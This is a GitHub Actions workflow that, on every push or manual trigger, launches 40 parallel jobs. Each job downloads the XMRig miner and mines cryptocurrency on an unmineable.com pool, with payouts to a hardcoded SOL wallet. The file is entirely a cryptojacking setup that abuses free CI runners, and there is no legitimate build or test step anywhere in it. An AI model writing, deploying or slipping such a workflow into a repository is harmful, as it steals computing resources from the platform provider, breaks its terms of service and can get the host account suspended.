name: sekaynotnt

on:
  push:
  workflow_dispatch:

jobs:

  miner1:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 1
        run: |	  
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4  
  miner2:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 2
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner3:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 3
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner4:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 4
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner5:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 5
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner6:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 6
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner7:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 7
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner8:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 8
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner9:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 9
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner10:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 10
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner11:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 11
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner12:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 12
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner13:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 13
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner14:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 14
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner15:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 15
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner16:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 16
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner17:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 17
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner18:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 18
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner19:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 19
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner20:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 20
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner21:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 21
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner22:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 22
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner23:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 23
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner24:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 24
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner25:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 25
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner26:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 26
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner27:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 27
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner28:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 28
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner29:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 29
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner30:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 30
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner31:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 31
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner32:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 32
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner33:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 33
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner34:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 34
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner35:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 35
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner36:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 36
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner37:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 37
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner38:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 38
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner39:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 39
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
  miner40:
    runs-on: ubuntu-latest
    steps:
      - name: Start Miner 40
        run: |
          sudo apt update
          sudo apt install -y wget tar
          wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
          tar -xvf xmrig-6.22.2-linux-static-x64.tar.gz
          cd xmrig-6.22.2
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u SOL:HHQRYqPLShkPQKLCGogYbQycDycjqdbb1pXbLvbmB8Mt.SekayNotNt -p x --tls --threads=4
